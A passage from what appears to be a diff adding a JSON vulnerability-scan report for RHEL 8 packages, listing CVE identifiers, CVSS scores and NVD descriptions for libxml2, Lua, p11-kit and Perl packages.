"availability_impact": "HIGH", + "base_score": 5.9, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 2.2, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-16135" + } + ], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 6.5, + "exploitability_score": 3.9, + "impact_score": 2.5 + }, + "id": "CVE-2020-24977" + } + ], + "package": "libxml2-2.9.7-8.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "libxml2", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.9.7-8.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-24977", + "vendor_data": [], + "vuln": "CVE-2020-24977", + "extra": { + "description": "GNOME project libxml2 v2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c. The issue has been fixed in commit 50f06b3e.", + "id": "CVE-2020-24977", + "link": "https://access.redhat.com/security/cve/CVE-2020-24977", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 6.4, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "LOW", + "base_score": 6.5, + "base_severity": "Medium", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 2.5, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", + "version": "3.1" + }, + "id": "CVE-2020-24977" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.3, + "exploitability_score": 3.9, + "impact_score": 1.4 + }, + "id": "CVE-2020-24370" + } + ], + "package": "lua-5.3.4-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "lua", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.3.4-11.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-24370", + "vendor_data": [], + "vuln": "CVE-2020-24370", + "extra": { + "description": "ldebug.c in Lua 5.4.0 allows a negation overflow and segmentation fault in getlocal and setlocal, as demonstrated by getlocal(3,2^31).", + "id": "CVE-2020-24370", + "link": "https://access.redhat.com/security/cve/CVE-2020-24370", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "LOW", + "base_score": 5.3, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 1.4, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "version": "3.1" + }, + "id": "CVE-2020-24370" + } + ], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.3, + "exploitability_score": 3.9, + "impact_score": 1.4 + }, + "id": "CVE-2020-24370" + } + ], + "package": "lua-libs-5.3.4-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "lua-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.3.4-11.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-24370", + "vendor_data": [], + "vuln": "CVE-2020-24370", + "extra": { + "description": "ldebug.c in Lua 5.4.0 allows a negation overflow and segmentation fault in getlocal and setlocal, as demonstrated by getlocal(3,2^31).", + "id": "CVE-2020-24370", + "link": "https://access.redhat.com/security/cve/CVE-2020-24370", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "LOW", + "base_score": 5.3, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 1.4, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "version": "3.1" + }, + "id": "CVE-2020-24370" + } + ], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-29361" + } + ], + "package": "p11-kit-0.23.14-5.el8_0", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "p11-kit", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.23.14-5.el8_0", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-29361", + "vendor_data": [], + "vuln": "CVE-2020-29361", + "extra": { + "description": "An issue was discovered in p11-kit 0.21.1 through 0.23.21. Multiple integer overflows have been discovered in the array allocations in the p11-kit library and the p11-kit list command, where overflow checks are missing before calling realloc or calloc.", + "id": "CVE-2020-29361", + "link": "https://access.redhat.com/security/cve/CVE-2020-29361", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-29361" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.3, + "exploitability_score": 3.9, + "impact_score": 1.4 + }, + "id": "CVE-2020-29362" + } + ], + "package": "p11-kit-0.23.14-5.el8_0", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "p11-kit", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.23.14-5.el8_0", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-29362", + "vendor_data": [], + "vuln": "CVE-2020-29362", + "extra": { + "description": "An issue was discovered in p11-kit 0.21.1 through 0.23.21. A heap-based buffer over-read has been discovered in the RPC protocol used by thep11-kit server/remote commands and the client library. When the remote entity supplies a byte array through a serialized PKCS#11 function call, the receiving entity may allow the reading of up to 4 bytes of memory past the heap allocation.", + "id": "CVE-2020-29362", + "link": "https://access.redhat.com/security/cve/CVE-2020-29362", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:N/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 5.3, + "base_severity": "Medium", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 1.4, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "version": "3.1" + }, + "id": "CVE-2020-29362" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-29363" + } + ], + "package": "p11-kit-0.23.14-5.el8_0", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "p11-kit", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.23.14-5.el8_0", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-29363", + "vendor_data": [], + "vuln": "CVE-2020-29363", + "extra": { + "description": "An issue was discovered in p11-kit 0.23.6 through 0.23.21. A heap-based buffer overflow has been discovered in the RPC protocol used by p11-kit server/remote commands and the client library. When the remote entity supplies a serialized byte array in a CK_ATTRIBUTE, the receiving entity may not allocate sufficient length for the buffer to store the deserialized value.", + "id": "CVE-2020-29363", + "link": "https://access.redhat.com/security/cve/CVE-2020-29363", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-29363" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-29361" + } + ], + "package": "p11-kit-trust-0.23.14-5.el8_0", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "p11-kit-trust", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.23.14-5.el8_0", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-29361", + "vendor_data": [], + "vuln": "CVE-2020-29361", + "extra": { + "description": "An issue was discovered in p11-kit 0.21.1 through 0.23.21. Multiple integer overflows have been discovered in the array allocations in the p11-kit library and the p11-kit list command, where overflow checks are missing before calling realloc or calloc.", + "id": "CVE-2020-29361", + "link": "https://access.redhat.com/security/cve/CVE-2020-29361", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-29361" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.3, + "exploitability_score": 3.9, + "impact_score": 1.4 + }, + "id": "CVE-2020-29362" + } + ], + "package": "p11-kit-trust-0.23.14-5.el8_0", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "p11-kit-trust", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.23.14-5.el8_0", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-29362", + "vendor_data": [], + "vuln": "CVE-2020-29362", + "extra": { + "description": "An issue was discovered in p11-kit 0.21.1 through 0.23.21. A heap-based buffer over-read has been discovered in the RPC protocol used by thep11-kit server/remote commands and the client library. When the remote entity supplies a byte array through a serialized PKCS#11 function call, the receiving entity may allow the reading of up to 4 bytes of memory past the heap allocation.", + "id": "CVE-2020-29362", + "link": "https://access.redhat.com/security/cve/CVE-2020-29362", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:N/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 5.3, + "base_severity": "Medium", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 1.4, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "version": "3.1" + }, + "id": "CVE-2020-29362" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-29363" + } + ], + "package": "p11-kit-trust-0.23.14-5.el8_0", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "p11-kit-trust", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.23.14-5.el8_0", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-29363", + "vendor_data": [], + "vuln": "CVE-2020-29363", + "extra": { + "description": "An issue was discovered in p11-kit 0.23.6 through 0.23.21. A heap-based buffer overflow has been discovered in the RPC protocol used by p11-kit server/remote commands and the client library. When the remote entity supplies a serialized byte array in a CK_ATTRIBUTE, the receiving entity may not allocate sufficient length for the buffer to store the deserialized value.", + "id": "CVE-2020-29363", + "link": "https://access.redhat.com/security/cve/CVE-2020-29363", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-29363" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 8.2, + "exploitability_score": 3.9, + "impact_score": 4.2 + }, + "id": "CVE-2020-10543" + } + ], + "package": "perl-interpreter-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-interpreter", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-10543", + "vendor_data": [], + "vuln": "CVE-2020-10543", + "extra": { + "description": "Perl before 5.30.3 on 32-bit platforms allows a heap-based buffer overflow because nested regular expression quantifiers have an integer overflow.", + "id": "CVE-2020-10543", + "link": "https://access.redhat.com/security/cve/CVE-2020-10543", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 6.4, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 8.2, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 4.2, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "version": "3.1" + }, + "id": "CVE-2020-10543" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": 8.6, + "exploitability_score": 3.9, + "impact_score": 4.7 + }, + "id": "CVE-2020-10878" + } + ], + "package": "perl-interpreter-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-interpreter", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-10878", + "vendor_data": [], + "vuln": "CVE-2020-10878", + "extra": { + "description": "Perl before 5.30.3 has an integer overflow related to mishandling of a \"PL_regkind[OP(n)] == NOTHING\" situation. A crafted regular expression could lead to malformed bytecode with a possibility of instruction injection.", + "id": "CVE-2020-10878", + "link": "https://access.redhat.com/security/cve/CVE-2020-10878", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 7.5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 6.4, + "integrity_impact": "PARTIAL" + }, + "severity": "High", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 8.6, + "base_severity": "High", + "confidentiality_impact": "LOW", + "exploitability_score": 3.9, + "impact_score": 4.7, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", + "version": "3.1" + }, + "id": "CVE-2020-10878" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-12723" + } + ], + "package": "perl-interpreter-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-interpreter", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-12723", + "vendor_data": [], + "vuln": "CVE-2020-12723", + "extra": { + "description": "regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.", + "id": "CVE-2020-12723", + "link": "https://access.redhat.com/security/cve/CVE-2020-12723", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-12723" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 6.4, + "exploitability_score": 10, + "impact_score": 4.9 + }, + "cvss_v3": { + "base_score": 8.2, + "exploitability_score": 3.9, + "impact_score": 4.2 + }, + "id": "CVE-2020-10543" + } + ], + "package": "perl-libs-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-10543", + "vendor_data": [], + "vuln": "CVE-2020-10543", + "extra": { + "description": "Perl before 5.30.3 on 32-bit platforms allows a heap-based buffer overflow because nested regular expression quantifiers have an integer overflow.", + "id": "CVE-2020-10543", + "link": "https://access.redhat.com/security/cve/CVE-2020-10543", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 6.4, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 4.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:P/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 8.2, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 4.2, + "integrity_impact": "LOW", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "version": "3.1" + }, + "id": "CVE-2020-10543" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": false, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.5, + "exploitability_score": 10, + "impact_score": 6.4 + }, + "cvss_v3": { + "base_score": 8.6, + "exploitability_score": 3.9, + "impact_score": 4.7 + }, + "id": "CVE-2020-10878" + } + ], + "package": "perl-libs-5.26.3-416.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "perl-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "5.26.3-416.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-10878", + "vendor_data": [], + "vuln": "CVE-2020-10878", + "extra": { + "description": "Perl before 5.30.3 has an integer overflow related to mishandling of a \"PL_regkind[OP(n)] == NOTHING\" situation. A crafted regular expression could lead to malformed bytecode with a possibility of instruction injection.", + "id": "CVE-2020-10878", + "link": "https://access.redhat.com/security/cve/CVE-2020-10878", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + 